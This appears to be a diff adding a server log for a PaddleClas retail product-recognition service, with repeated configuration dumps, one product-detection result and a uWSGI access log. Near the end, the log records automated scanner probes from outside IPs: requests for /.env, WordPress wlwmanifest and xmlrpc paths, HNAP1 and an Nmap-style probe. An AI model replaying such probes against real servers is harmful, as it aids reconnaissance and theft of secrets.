+=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:30 INFO: Global : +2022-02-02 15:11:30 INFO: batch_size : 32 +2022-02-02 15:11:30 INFO: cpu_num_threads : 1 +2022-02-02 15:11:30 INFO: enable_benchmark : True +2022-02-02 15:11:30 INFO: enable_mkldnn : True +2022-02-02 15:11:30 INFO: enable_profile : False +2022-02-02 15:11:30 INFO: gpu_mem : 8000 +2022-02-02 15:11:30 INFO: ir_optim : True +2022-02-02 15:11:30 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:30 INFO: use_fp16 : False +2022-02-02 15:11:30 INFO: use_gpu : False +2022-02-02 15:11:30 INFO: use_tensorrt : False +2022-02-02 15:11:30 INFO: IndexProcess : +2022-02-02 15:11:30 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:30 INFO: delimiter : +2022-02-02 15:11:30 INFO: dist_type : IP +2022-02-02 15:11:30 INFO: embedding_size : 512 +2022-02-02 15:11:30 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:30 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:30 INFO: index_method : HNSW32 +2022-02-02 15:11:30 INFO: index_operation : new +2022-02-02 15:11:30 INFO: RecPostProcess : None +2022-02-02 15:11:30 INFO: RecPreProcess : +2022-02-02 15:11:30 INFO: transform_ops : +2022-02-02 15:11:30 INFO: ResizeImage : +2022-02-02 15:11:30 INFO: size : 224 +2022-02-02 15:11:30 INFO: NormalizeImage : +2022-02-02 15:11:30 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:30 INFO: order : +2022-02-02 15:11:30 INFO: scale : 0.00392157 +2022-02-02 15:11:30 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:30 INFO: ToCHWImage : None + 0%| | 0/188 [00:00 generated 34 bytes in 7458 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:42 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:42 INFO: Global : +2022-02-02 15:11:42 INFO: batch_size : 32 +2022-02-02 15:11:42 INFO: cpu_num_threads : 1 +2022-02-02 15:11:42 INFO: enable_benchmark : True +2022-02-02 15:11:42 INFO: enable_mkldnn : True +2022-02-02 15:11:42 INFO: enable_profile : False +2022-02-02 15:11:42 INFO: gpu_mem : 8000 +2022-02-02 15:11:42 INFO: ir_optim : True +2022-02-02 15:11:42 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:42 INFO: use_fp16 : False +2022-02-02 15:11:42 INFO: use_gpu : False +2022-02-02 15:11:42 INFO: use_tensorrt : False +2022-02-02 15:11:42 INFO: IndexProcess : +2022-02-02 15:11:42 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:42 INFO: delimiter : +2022-02-02 15:11:42 INFO: dist_type : IP +2022-02-02 15:11:42 INFO: embedding_size : 512 +2022-02-02 15:11:42 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:42 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:42 INFO: index_method : HNSW32 +2022-02-02 15:11:42 INFO: index_operation : new +2022-02-02 15:11:42 INFO: RecPostProcess : None +2022-02-02 15:11:42 INFO: RecPreProcess : +2022-02-02 15:11:42 INFO: transform_ops : +2022-02-02 15:11:42 INFO: ResizeImage : +2022-02-02 15:11:42 INFO: size : 224 +2022-02-02 15:11:42 INFO: NormalizeImage : +2022-02-02 15:11:42 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:42 INFO: order : +2022-02-02 15:11:42 INFO: scale : 0.00392157 +2022-02-02 15:11:42 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:42 INFO: ToCHWImage : None + 0%| | 0/187 [00:00 generated 34 bytes in 7424 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:11:56 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:11:56 INFO: Global : +2022-02-02 15:11:56 INFO: batch_size : 32 +2022-02-02 15:11:56 INFO: cpu_num_threads : 1 +2022-02-02 15:11:56 INFO: enable_benchmark : True +2022-02-02 15:11:56 INFO: enable_mkldnn : True +2022-02-02 15:11:56 INFO: enable_profile : False +2022-02-02 15:11:56 INFO: gpu_mem : 8000 +2022-02-02 15:11:56 INFO: ir_optim : True +2022-02-02 15:11:56 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:11:56 INFO: use_fp16 : False +2022-02-02 15:11:56 INFO: use_gpu : False +2022-02-02 15:11:56 INFO: use_tensorrt : False +2022-02-02 15:11:56 INFO: IndexProcess : +2022-02-02 15:11:56 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:11:56 INFO: delimiter : +2022-02-02 15:11:56 INFO: dist_type : IP +2022-02-02 15:11:56 INFO: embedding_size : 512 +2022-02-02 15:11:56 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:11:56 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:11:56 INFO: index_method : HNSW32 +2022-02-02 15:11:56 INFO: index_operation : new +2022-02-02 15:11:56 INFO: RecPostProcess : None +2022-02-02 15:11:56 INFO: RecPreProcess : +2022-02-02 15:11:56 INFO: transform_ops : +2022-02-02 15:11:56 INFO: ResizeImage : +2022-02-02 15:11:56 INFO: size : 224 +2022-02-02 15:11:56 INFO: NormalizeImage : +2022-02-02 15:11:56 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:11:56 INFO: order : +2022-02-02 15:11:56 INFO: scale : 0.00392157 +2022-02-02 15:11:56 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:11:56 INFO: ToCHWImage : None + 0%| | 0/186 [00:00 generated 34 bytes in 7348 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:12:08 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:12:08 INFO: Global : +2022-02-02 15:12:08 INFO: batch_size : 32 +2022-02-02 15:12:08 INFO: cpu_num_threads : 1 +2022-02-02 15:12:08 INFO: enable_benchmark : True +2022-02-02 15:12:08 INFO: enable_mkldnn : True +2022-02-02 15:12:08 INFO: enable_profile : False +2022-02-02 15:12:08 INFO: gpu_mem : 8000 +2022-02-02 15:12:08 INFO: ir_optim : True +2022-02-02 15:12:08 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:12:08 INFO: use_fp16 : False +2022-02-02 15:12:08 INFO: use_gpu : False +2022-02-02 15:12:08 INFO: use_tensorrt : False +2022-02-02 15:12:08 INFO: IndexProcess : +2022-02-02 15:12:08 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:12:08 INFO: delimiter : +2022-02-02 15:12:08 INFO: dist_type : IP +2022-02-02 15:12:08 INFO: embedding_size : 512 +2022-02-02 15:12:08 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:12:08 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:12:08 INFO: index_method : HNSW32 +2022-02-02 15:12:08 INFO: index_operation : new +2022-02-02 15:12:08 INFO: RecPostProcess : None +2022-02-02 15:12:08 INFO: RecPreProcess : +2022-02-02 15:12:08 INFO: transform_ops : +2022-02-02 15:12:08 INFO: ResizeImage : +2022-02-02 15:12:08 INFO: size : 224 +2022-02-02 15:12:08 INFO: NormalizeImage : +2022-02-02 15:12:08 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:12:08 INFO: order : +2022-02-02 15:12:08 INFO: scale : 0.00392157 +2022-02-02 15:12:08 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:12:08 INFO: ToCHWImage : None + 0%| | 0/185 [00:00 generated 34 bytes in 7210 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:12:19 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:12:19 INFO: Global : +2022-02-02 15:12:19 INFO: batch_size : 32 +2022-02-02 15:12:19 INFO: cpu_num_threads : 1 +2022-02-02 15:12:19 INFO: enable_benchmark : True +2022-02-02 15:12:19 INFO: enable_mkldnn : True +2022-02-02 15:12:19 INFO: enable_profile : False +2022-02-02 15:12:19 INFO: gpu_mem : 8000 +2022-02-02 15:12:19 INFO: ir_optim : True +2022-02-02 15:12:19 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:12:19 INFO: use_fp16 : False +2022-02-02 15:12:19 INFO: use_gpu : False +2022-02-02 15:12:19 INFO: use_tensorrt : False +2022-02-02 15:12:19 INFO: IndexProcess : +2022-02-02 15:12:19 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:12:19 INFO: delimiter : +2022-02-02 15:12:19 INFO: dist_type : IP +2022-02-02 15:12:19 INFO: embedding_size : 512 +2022-02-02 15:12:19 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:12:19 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:12:19 INFO: index_method : HNSW32 +2022-02-02 15:12:19 INFO: index_operation : new +2022-02-02 15:12:19 INFO: RecPostProcess : None +2022-02-02 15:12:19 INFO: RecPreProcess : +2022-02-02 15:12:19 INFO: transform_ops : +2022-02-02 15:12:19 INFO: ResizeImage : +2022-02-02 15:12:19 INFO: size : 224 +2022-02-02 15:12:19 INFO: NormalizeImage : +2022-02-02 15:12:19 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:12:19 INFO: order : +2022-02-02 15:12:19 INFO: scale : 0.00392157 +2022-02-02 15:12:19 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:12:19 INFO: ToCHWImage : None + 0%| | 0/184 [00:00 generated 34 bytes in 7116 msecs (HTTP/1.1 200) 5 headers in 157 bytes (1 switches on core 0) +2022-02-02 15:15:15 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:15:15 INFO: Global : +2022-02-02 15:15:15 INFO: batch_size : 32 +2022-02-02 15:15:15 INFO: cpu_num_threads : 1 +2022-02-02 15:15:15 INFO: enable_benchmark : True +2022-02-02 15:15:15 INFO: enable_mkldnn : True +2022-02-02 15:15:15 INFO: enable_profile : False +2022-02-02 15:15:15 INFO: gpu_mem : 8000 +2022-02-02 15:15:15 INFO: ir_optim : True +2022-02-02 15:15:15 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:15:15 INFO: use_fp16 : False +2022-02-02 15:15:15 INFO: use_gpu : False +2022-02-02 15:15:15 INFO: use_tensorrt : False +2022-02-02 15:15:15 INFO: IndexProcess : +2022-02-02 15:15:15 INFO: data_file : /root/Smart_container/PaddleClas/dataset/retail/data_update.txt +2022-02-02 15:15:15 INFO: delimiter : +2022-02-02 15:15:15 INFO: dist_type : IP +2022-02-02 15:15:15 INFO: embedding_size : 512 +2022-02-02 15:15:15 INFO: image_root : /root/Smart_container/PaddleClas/dataset/retail +2022-02-02 15:15:15 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:15:15 INFO: index_method : HNSW32 +2022-02-02 15:15:15 INFO: index_operation : new +2022-02-02 15:15:15 INFO: RecPostProcess : None +2022-02-02 15:15:15 INFO: RecPreProcess : +2022-02-02 15:15:15 INFO: transform_ops : +2022-02-02 15:15:15 INFO: ResizeImage : +2022-02-02 15:15:15 INFO: size : 224 +2022-02-02 15:15:15 INFO: NormalizeImage : +2022-02-02 15:15:15 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:15:15 INFO: order : +2022-02-02 15:15:15 INFO: scale : 0.00392157 +2022-02-02 15:15:15 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:15:15 INFO: ToCHWImage : None + 0%| | 0/185 [00:00 generated 34 bytes in 7298 msecs (HTTP/1.1 200) 5 headers in 157 bytes (33 switches on core 0) +2022-02-02 15:15:52 INFO: +=========================================================== +== PaddleClas is powered by PaddlePaddle ! == +=========================================================== +== == +== For more info please go to the following website. == +== == +== https://github.com/PaddlePaddle/PaddleClas == +=========================================================== + +2022-02-02 15:15:52 INFO: DetPostProcess : +2022-02-02 15:15:52 INFO: DetPreProcess : +2022-02-02 15:15:52 INFO: transform_ops : +2022-02-02 15:15:52 INFO: DetResize : +2022-02-02 15:15:52 INFO: interp : 2 +2022-02-02 15:15:52 INFO: keep_ratio : False +2022-02-02 15:15:52 INFO: target_size : [640, 640] +2022-02-02 15:15:52 INFO: DetNormalizeImage : +2022-02-02 15:15:52 INFO: is_scale : True +2022-02-02 15:15:52 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:15:52 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:15:52 INFO: DetPermute : +2022-02-02 15:15:52 INFO: Global : +2022-02-02 15:15:52 INFO: batch_size : 1 +2022-02-02 15:15:52 INFO: cpu_num_threads : 1 +2022-02-02 15:15:52 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-02 15:15:52 INFO: enable_benchmark : True +2022-02-02 15:15:52 INFO: enable_mkldnn : True +2022-02-02 15:15:52 INFO: enable_profile : False +2022-02-02 15:15:52 INFO: gpu_mem : 8000 +2022-02-02 15:15:52 INFO: image_shape : [3, 640, 640] +2022-02-02 15:15:52 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/retail/test1.jpg +2022-02-02 15:15:52 INFO: ir_optim : True +2022-02-02 15:15:52 INFO: labe_list : ['foreground'] +2022-02-02 15:15:52 INFO: max_det_results : 5 +2022-02-02 15:15:52 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-02 15:15:52 INFO: rec_nms_thresold : 0.05 +2022-02-02 15:15:52 INFO: threshold : 0.2 +2022-02-02 15:15:52 INFO: use_fp16 : False +2022-02-02 15:15:52 INFO: use_gpu : False +2022-02-02 15:15:52 INFO: use_tensorrt : False +2022-02-02 15:15:52 INFO: IndexProcess : +2022-02-02 15:15:52 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-02 15:15:52 INFO: return_k : 5 +2022-02-02 15:15:52 INFO: score_thres : 0.5 +2022-02-02 15:15:52 INFO: RecPostProcess : None +2022-02-02 15:15:52 INFO: RecPreProcess : +2022-02-02 15:15:52 INFO: transform_ops : +2022-02-02 15:15:52 INFO: ResizeImage : +2022-02-02 15:15:52 INFO: size : 224 +2022-02-02 15:15:52 INFO: NormalizeImage : +2022-02-02 15:15:52 INFO: mean : [0.485, 0.456, 0.406] +2022-02-02 15:15:52 INFO: order : +2022-02-02 15:15:52 INFO: scale : 0.00392157 +2022-02-02 15:15:52 INFO: std : [0.229, 0.224, 0.225] +2022-02-02 15:15:52 INFO: ToCHWImage : None +Inference: 373.00872802734375 ms per batch image +[{'bbox': [420, 507, 716, 1058], 'rec_docs': '小度充电宝', 'rec_scores': 0.8625434}, {'bbox': [20, 87, 332, 1227], 'rec_docs': '小度电子保温杯', 'rec_scores': 0.720316}] +{'bbox': [420, 507, 716, 1058], 'rec_docs': '小度充电宝', 'rec_scores': 0.8625434} +{'bbox': [20, 87, 332, 1227], 'rec_docs': '小度电子保温杯', 'rec_scores': 0.720316} +234 +["{'bbox': [420, 507, 716, 1058], 'rec_docs': '小度充电宝', 'rec_scores': 0.8625434}\n", "{'bbox': [20, 87, 332, 1227], 'rec_docs': '小度电子保温杯', 'rec_scores': 0.720316}\n"] +['小度充电宝', '小度电子保温杯'] +['小度充电宝', '48', '小度电子保温杯', '46'] +[pid: 19145|app: 0|req: 2/389] 49.79.98.245 () {36 vars in 810 bytes} [Wed Feb 2 15:15:51 2022] POST /reference/ => generated 172 bytes in 3095 msecs (HTTP/1.1 200) 5 headers in 158 bytes (36 switches on core 0) +[pid: 19148|app: 0|req: 332/390] 61.147.15.67 () {40 vars in 669 bytes} [Wed Feb 2 15:15:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 38/391] 61.147.15.67 () {40 vars in 732 bytes} [Wed Feb 2 15:17:29 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 333/392] 106.75.169.79 () {30 vars in 328 bytes} [Wed Feb 2 16:22:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 31.44.185.119 client_port: 7676] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 334/393] 83.97.20.34 () {30 vars in 328 bytes} [Wed Feb 2 16:44:51 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 335/394] 128.14.134.170 () {34 vars in 488 bytes} [Wed Feb 2 18:09:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 336/395] 209.17.96.234 () {30 vars in 410 bytes} [Wed Feb 2 18:43:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 337/396] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 2 18:50:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 338/397] 139.162.145.250 () {34 vars in 445 bytes} [Wed Feb 2 18:58:19 2022] GET /bag2 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 39/398] 39.103.159.236 () {22 vars in 234 bytes} [Wed Feb 2 20:10:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 339/399] 39.103.159.236 () {22 vars in 297 bytes} [Wed Feb 2 20:10:09 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 340/400] 39.103.159.236 () {22 vars in 239 bytes} [Wed Feb 2 20:10:15 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 341/401] 39.103.159.236 () {22 vars in 239 bytes} [Wed Feb 2 20:10:19 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 342/402] 39.103.159.236 () {40 vars in 485 bytes} [Wed Feb 2 20:10:22 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 343/403] 185.142.236.40 () {34 vars in 537 bytes} [Wed Feb 2 20:43:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 40/404] 185.142.236.40 () {30 vars in 360 bytes} [Wed Feb 2 20:43:15 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 344/405] 185.142.236.40 () {30 vars in 362 bytes} [Wed Feb 2 20:43:16 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 41/406] 185.142.236.40 () {30 vars in 388 bytes} [Wed Feb 2 20:43:17 2022] GET /.well-known/security.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 3/407] 185.142.236.40 () {36 vars in 515 bytes} [Wed Feb 2 20:43:20 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 345/408] 130.211.54.158 () {42 vars in 564 bytes} [Wed Feb 2 20:43:25 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[uwsgi-http key: client_addr: 185.219.52.134 client_port: 51190] hr_read(): Connection reset by peer [plugins/http/http.c line 918] +[pid: 19148|app: 0|req: 346/409] 107.189.28.51 () {28 vars in 310 bytes} [Wed Feb 2 22:56:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 347/410] 107.189.28.51 () {40 vars in 671 bytes} [Wed Feb 2 22:56:04 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 348/411] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 2 23:06:23 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 349/412] 193.118.53.210 () {34 vars in 488 bytes} [Thu Feb 3 00:14:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 350/413] 106.14.195.175 () {34 vars in 460 bytes} [Thu Feb 3 00:38:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 351/414] 64.62.197.122 () {28 vars in 307 bytes} [Thu Feb 3 01:00:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 352/415] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 3 01:05:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 353/416] 62.171.150.168 () {28 vars in 311 bytes} [Thu Feb 3 01:15:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 354/417] 20.203.156.151 () {38 vars in 609 bytes} [Thu Feb 3 01:21:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 42/418] 20.203.156.151 () {38 vars in 609 bytes} [Thu Feb 3 01:21:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 355/419] 20.203.156.151 () {38 vars in 663 bytes} [Thu Feb 3 01:21:08 2022] GET /wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 43/420] 20.203.156.151 () {38 vars in 636 bytes} [Thu Feb 3 01:21:08 2022] GET /xmlrpc.php?rsd => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 44/421] 20.203.156.151 () {38 vars in 609 bytes} [Thu Feb 3 01:21:08 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 356/422] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:08 2022] GET /blog/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 45/423] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:08 2022] GET /web/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 357/424] 20.203.156.151 () {38 vars in 683 bytes} [Thu Feb 3 01:21:09 2022] GET /wordpress/wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 358/425] 20.203.156.151 () {38 vars in 679 bytes} [Thu Feb 3 01:21:09 2022] GET /website/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 359/426] 20.203.156.151 () {38 vars in 669 bytes} [Thu Feb 3 01:21:09 2022] GET /wp/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 360/427] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:09 2022] GET /news/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 361/428] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:09 2022] GET /2020/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 362/429] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:10 2022] GET /2019/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 363/430] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:10 2022] GET /shop/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 364/431] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:10 2022] GET /wp1/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 365/432] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:10 2022] GET /test/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 366/433] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:11 2022] GET /wp2/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 367/434] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:11 2022] GET /site/wp-includes/wlwmanifest.xml => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 368/435] 20.203.156.151 () {38 vars in 671 bytes} [Thu Feb 3 01:21:11 2022] GET /cms/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 369/436] 20.203.156.151 () {38 vars in 673 bytes} [Thu Feb 3 01:21:11 2022] GET /sito/wp-includes/wlwmanifest.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 370/437] 101.133.155.170 () {32 vars in 504 bytes} [Thu Feb 3 01:53:53 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 371/438] 132.226.131.244 () {36 vars in 434 bytes} [Thu Feb 3 02:23:43 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 372/439] 62.171.132.199 () {40 vars in 672 bytes} [Thu Feb 3 04:26:38 2022] 